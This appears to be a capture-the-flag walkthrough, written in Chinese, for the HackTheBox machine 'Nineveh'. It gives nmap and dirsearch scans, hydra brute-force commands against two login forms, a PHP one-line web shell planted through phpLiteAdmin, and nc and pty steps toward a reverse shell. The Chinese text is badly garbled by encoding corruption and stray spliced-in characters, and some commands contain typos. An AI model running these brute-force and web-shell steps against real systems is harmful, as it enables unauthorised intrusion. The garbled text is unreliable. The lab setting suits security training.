nmap -sC -sV -oA nmap 10.10.10.43
探測(cè)操作系統(tǒng)服務(wù)及相關(guān)版本赚导,并保存為nmap.nmap.
根據(jù)ssl-cert可看到主機(jī)名。
編輯 /etc/hosts 配置ip及對(duì)應(yīng)主機(jī)名
vi /etc/hosts
10.10.10.43 nineveh
HTTP協(xié)議傳輸?shù)臄?shù)據(jù)都是未加密的饰躲,也就是明文的,因此使用HTTP協(xié)議傳輸隱私信息非常不安全肥缔,為了保證這些隱私數(shù)據(jù)能加密傳輸撒轮,于是網(wǎng)景公司設(shè)計(jì)了SSL(Secure Sockets Layer)協(xié)議用于對(duì)HTTP協(xié)議傳輸?shù)臄?shù)據(jù)進(jìn)行加密产捞,從而就誕生了HTTPS醇锚。
簡(jiǎn)單來(lái)說(shuō),HTTPS協(xié)議是由SSL+HTTP協(xié)議構(gòu)建的可進(jìn)行加密傳輸坯临、身份認(rèn)證的網(wǎng)絡(luò)協(xié)議搂抒,要比http協(xié)議安全艇搀。
dirsearch.py -u https://nineveh.htb -e *
dirsearch.py -u nineveh.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e *
使用hydra爆破
hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/10k_most_common.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64
hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/10k_most_common.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 64
成功爆破到密碼
未爆破到db密碼 更換字典嘗試
grep -i ^password /usr/shark/wordlists/rockyou.txt >pw
hydra -l admin -P pw10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 64
爆破到db密碼為password123,發(fā)現(xiàn)為phpliteadmin系統(tǒng)求晶,搜索下以前的漏洞
searchsploit phpliteadmin
創(chuàng)建新數(shù)據(jù)庫(kù)并已php為擴(kuò)展名焰雕,創(chuàng)建表寫(xiě)入php一句話。
<? php echo system($_REQUEST['dd']); ?>
只能重命名為ninevehNotes.php 芳杏。根據(jù)提示更改下一句話
<? php echo system($_REQUEST["dd"]); ?>
根據(jù)提示更改下一句話
<? php echo system($_REQUEST["dd"]); ?>
利用nc getshell
nc -lvpn 9999
反向shell獲取參考http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
將其轉(zhuǎn)換成交互式的shell矩屁,方便運(yùn)行su。在終端中執(zhí)行:
python -c 'import pty;pty.spawn('/bin/bash')'
python2沒(méi)有spawn爵赵,我們使用python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
我們需要設(shè)置tty 保證我們?cè)趎c shell 上與終端完全交互吝秕,以便使用所有功能(tab-complete,history空幻,job control等):
參考:如何將簡(jiǎn)單的Shell轉(zhuǎn)換成為完全交互式的TTY
http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/3529.html
